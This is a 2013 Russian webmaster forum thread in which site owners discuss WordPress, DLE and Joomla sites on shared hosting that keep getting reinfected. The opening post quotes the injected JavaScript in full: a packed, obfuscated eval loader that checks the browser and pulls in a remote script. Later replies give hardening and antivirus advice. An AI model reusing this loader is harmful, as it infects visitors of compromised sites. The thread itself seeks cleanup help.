Вернуться   SEO форум - оптимизация и продвижение сайтов > Web разработки > Безопасность

Важная информация
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности.

Ответ
 
Опции темы Оценить тему Опции просмотра
Старый 30.11.2013, 10:44   #1
 
Аватар для hightstreams
 
Сообщений: 333
FR (активность): 30,247

Доп. информация
По умолчанию Автор темы Где и как позакрывать дыры от вирусов на хостинге?

Периодически на хостинге заражаются практически все сайты, смс: вп, дле, джумла.
Предполагаю, что очень серьезного на сайтах ничего нет, так как вебмастера Я и Г уже бы написали.
Сидит какая-то хрень, я все удалю, а оно снова в сайты гадню подсаживает.
вот скрин, что было:


Все файлы имеют расширение js.
Во всех одинаковое содержание:
Код:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d A(l){H(e.t&&e.G){5 s=e.G(\'1g\')[0];5 f=e.t(\'1h\');f.p(\'1i\',\'1j/1f\');f.p(\'l\',l);5 1e="=1a[<}8~j;%%]";5 1b="&4; y}[={4]";5 1c="1d/1k$#k]1l~z{1s:1t";5 19="%#1v=1r+3:%>1q";5 1m="X(^~1n{[[email protected]&1w-{W[";s.R(f)}}d E(){m x.O()}5 T="}[email protected];N`)I)*]%$J";5 M="6]2(P}7-18=.h 14";5 15="b`~+2*[email protected]";5 17="13$12[Y$+";5 V="*Z=.q`10{11";d v(c){m c.r(o)!=-1}5 1u="4,*@`n+S[/*25";5 1x="C^1X?K * L";5 1W="9]+;20+*{*>$+)*21-1Z";5 1Y="[w=23;$22";5 27="26($24]2[i?.>}!a}";5 B="1U://1E.1F.c/1G";5 o="o";5 1H="1V]6:1D}!1C";5 1y="1z(}0}#@g`0[1A%1B*b";5 1I="4]%?1J^`~1Q<~4&4[1R*Q ";5 1S="1T(1P";5 1O="+~,& 1K!3`!(Q*/";d D(c){m c.r("1L")==-1}d F(){5 c=x.1M.1N();H(D(c)&&v(c)&&E()){A(B)}}F();',62,132,'|||||var|||||||ua|function|document|script_tag||||||src|return||win|setAttri
bute||indexOf|head_tag|createElement||isWin||navigator|||includeJavascript|url||n
otChrome|cond3|includeCounter|getElementsByTagName|if|oJTM7|pr|||bDyWnY1|UxJ|java
Enabled|xX||appendChild||bDyWnY0|tk|bDyWnY4|||abX|o5|RJ|Zme_|Pg|311|0Xf|bDyWnY2|u
6|bDyWnY3|rX|eqCaxYl3|O0BnA|eqCaxYl1|eqCaxYl2|81|eqCaxYl0|javascript|head|script|
type|text|Tm|l2|eqCaxYl4|6Z0a1|0p|bEc|MhW|KR6|uS|kS|BzqqE0|33|F9|BzqqE1|DtqGo1|7K
|rVDlg|6P|zi8|k4ld2|exaxad|pp|b23e441d405961897c09b2c9c9a2cdfcb23e441d405961897c0
9b2c9c9a2cdfcb23e441d405961897c09b2c9c9a2c|DtqGo0|DtqGo2|w6l|N3|chrome|userAgent|
toLowerCase|DtqGo4|OP|lE|QS|DtqGo3|tj4o0kk2|http|CX0|BzqqE2|5W|BzqqE3|5IG|Ct|92|6
Gr|x9YO|Ia8|57P|UtVM|BzqqE4'.split('|'),0,{}))
hightstreams вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 30.11.2013, 12:44   #2
 
Аватар для luserz
 
Сообщений: 561
FR (активность): 15,737

Доп. информация
По умолчанию

1. Закрывать ftp доступ.
2. Прописать директивы в htaccess для ip. (Т.е с каких ip адресов можно входить на ftp.. по сути после этого можно и оставить открытый ftp)
3. Сделать вход в админку или любую папку по паролю, для joomla, есть компонент jautentification.
-----------
Мне это помогло.


ЛУЧШАЯ тизерная сеть для женского трафика
luserz вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 30.11.2013, 19:21   #3
 
Аватар для Dr. Green
 
Сообщений: 82
FR (активность): 1,679

Доп. информация
По умолчанию

Сидит у тебя какой-нибудь шел.. а через него уже просеивают скрипты... либо смотри свой комп на наличие троянов... залей содержимое сайта в папку включая скрытые системные файлы* проверь ее тулзами аля Cureit.. мне пару раз помоголо...


«Сейчас самое время»
Dr. Green вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 30.11.2013, 19:24   #4
 
Аватар для luserz
 
Сообщений: 561
FR (активность): 15,737

Доп. информация
По умолчанию

Цитата:
Сообщение от Dr. Green Посмотреть сообщение
крытые системные файлы* проверь ее тулзами аля Cureit.. мне пару раз помоголо...
Честно говоря никогда не верил в касперского. Всю жизнь nod 32 и avast, dr.web. После того как полегло 20 сайтов, всеми просканил антивирусами. Надежда ушла. Я решил проверить касперычем. Он убрал всю заразу с компа. Нашел кучу вирусни. Я счастлив как слон и пользуюсь до сих пор им. На мой взгляд лучший вариант.


ЛУЧШАЯ тизерная сеть для женского трафика
luserz вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 30.11.2013, 19:26   #5
 
Аватар для JoomL
 
Сообщений: 181
FR (активность): 4,743

Доп. информация
По умолчанию

по мне так кажется что это проблема не цмс-ок а хостинга, потмоу как на одном хостинге у меня лежало 4 сайта 2 на простом хтмл, 1 джумла, 1 опен карт и все равно все сайты взломали.


Потерявшихся, в джунглях, русских туристов нашли по матерящимся попугаям.
JoomL вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 30.11.2013, 19:27   #6
 
Аватар для luserz
 
Сообщений: 561
FR (активность): 15,737

Доп. информация
По умолчанию

Цитата:
Сообщение от JoomL Посмотреть сообщение
по мне так кажется что это проблема не цмс-ок а хостинга
Не все хостинги боряться с вирусами.Jino например вообще настрать.
Читайте мой первый пост, помогает. Я уже 1 год проблем не знаю. Т.к закрыто для всех, кроме меня.


ЛУЧШАЯ тизерная сеть для женского трафика
luserz вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 30.11.2013, 19:44   #7
 
Аватар для JoomL
 
Сообщений: 181
FR (активность): 4,743

Доп. информация
По умолчанию

Цитата:
Сообщение от luserz Посмотреть сообщение
Не все хостинги боряться с вирусами.Jino например вообще настрать.
Читайте мой первый пост, помогает. Я уже 1 год проблем не знаю. Т.к закрыто для всех, кроме меня.
Дык делал это все + мне хостинг поставил на директорию джумлы site.ru/administrator дополнительный пароль. Все равно взламывают. Хостинг ihc.ru


Потерявшихся, в джунглях, русских туристов нашли по матерящимся попугаям.
JoomL вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 30.11.2013, 20:19   #8
 
Аватар для luserz
 
Сообщений: 561
FR (активность): 15,737

Доп. информация
По умолчанию

Цитата:
Сообщение от JoomL Посмотреть сообщение
Дык делал это все + мне хостинг поставил на директорию джумлы site.ru/administrator дополнительный пароль. Все равно взламывают. Хостинг ihc.ru
Да, ладно. Тут скорей всего конкуренты. У тебя точно вход в админку спрятан через jautentification, доступ к папке админ закрыт под паролем, в дерективе htaccess закрыт всем доступ по ftp кроме твоего ip??


ЛУЧШАЯ тизерная сеть для женского трафика
luserz вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 01.12.2013, 18:38   #9
 
Аватар для Dr. Green
 
Сообщений: 82
FR (активность): 1,679

Доп. информация
По умолчанию

Цитата:
Сообщение от luserz Посмотреть сообщение
Честно говоря никогда не верил в касперского. Всю жизнь nod 32 и avast, dr.web. После того как полегло 20 сайтов, всеми просканил антивирусами. Надежда ушла. Я решил проверить касперычем. Он убрал всю заразу с компа. Нашел кучу вирусни. Я счастлив как слон и пользуюсь до сих пор им. На мой взгляд лучший вариант.
Оффтоп:
эх... знаем )))))


«Сейчас самое время»
Dr. Green вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 01.12.2013, 21:53   #10
 
Аватар для JoomL
 
Сообщений: 181
FR (активность): 4,743

Доп. информация
По умолчанию

Цитата:
Сообщение от luserz Посмотреть сообщение
Да, ладно. Тут скорей всего конкуренты. У тебя точно вход в админку спрятан через jautentification, доступ к папке админ закрыт под паролем, в дерективе htaccess закрыт всем доступ по ftp кроме твоего ip??
Да кроме защиты паролем htaccess, т.к айпишник динамический у меня.


Потерявшихся, в джунглях, русских туристов нашли по матерящимся попугаям.
JoomL вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Ответ

Быстрый ответ
Ваше имя пользователя: Регистрация. Для входа нажмите здесь
Случайный вопрос

Сообщение:
Опции
Внимание!
Этой теме более 3095 дней. Вы можете оставить сообщение здесь. Но, обращаем внимание. Возможно, рациональней создать новую тему (найти свежее обсуждение)?


Опции темы
Опции просмотра Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Лечение сайта от вирусов и вредоносных скриптов revis Фриланс - ищу работу 0 02.10.2012 22:38
Бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге upgreyt Безопасность 0 01.10.2012 13:50
Услуги удаления вирусов с ваших web-сайтов. sitehelp Объявления 0 02.09.2012 16:12
Оцените генератор мемов Memino.ru (юзабилити, глюки, дыры) VKtraf Оценка сайтов 3 17.04.2012 18:13
Защита сайта от вирусов cyprby Программирование 2 24.10.2011 14:02

Текущее время: 08:48. Часовой пояс GMT +3.